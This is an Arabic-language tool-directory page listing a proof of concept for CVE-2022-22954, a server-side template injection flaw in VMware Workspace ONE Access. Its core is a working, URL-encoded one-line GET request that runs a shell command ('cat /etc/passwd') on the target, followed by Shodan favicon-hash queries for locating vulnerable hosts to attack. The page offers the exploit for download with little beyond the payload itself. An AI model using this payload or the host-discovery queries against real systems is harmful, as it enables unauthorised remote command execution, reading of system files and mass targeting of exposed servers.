Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
VMware-CVE-2022-22954 — إثبات مفهوم لاستغلال الثغرة CVE-2022-22954، وهي ثغرة حقن القوالب من جانب الخادم في Freemarker ضمن VMware Workspace ONE Access، مع طلب GET من سطر واحد واستعلامات Shodan لاكتشاف المضيفات القابلة للاختراق. | Kitploit
أدوات/GitHubGitHub/nieldk/vmware-cve-2022-22954
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلومات
GitHubnieldk/vmware-cve-2022-22954

VMware-CVE-2022-22954

إثبات مفهوم لاستغلال الثغرة CVE-2022-22954، وهي ثغرة حقن القوالب من جانب الخادم في Freemarker ضمن VMware Workspace ONE Access، مع طلب GET من سطر واحد واستعلامات Shodan لاكتشاف المضيفات القابلة للاختراق.

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

VMware CVE-2022-22954 ثغرة حقن القالب من جانب الخادم في Freemarker في Workspace ONE Access

POC لـ Vmware CVE-2022-22954

استخدم طلب GET هذا بسطر واحد!! سيؤدي ذلك إلى تنفيذ cat /etc/passwd

{host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d

استعلام Shodan: http.favicon.hash:-1250474341 http.favicon.hash:-713727389 http.favicon.hash:-1987733375 http.favicon.hash:1459735704 http.favicon.hash:198112565 http.favicon.hash:-1250474341

POC

تنزيل الأداة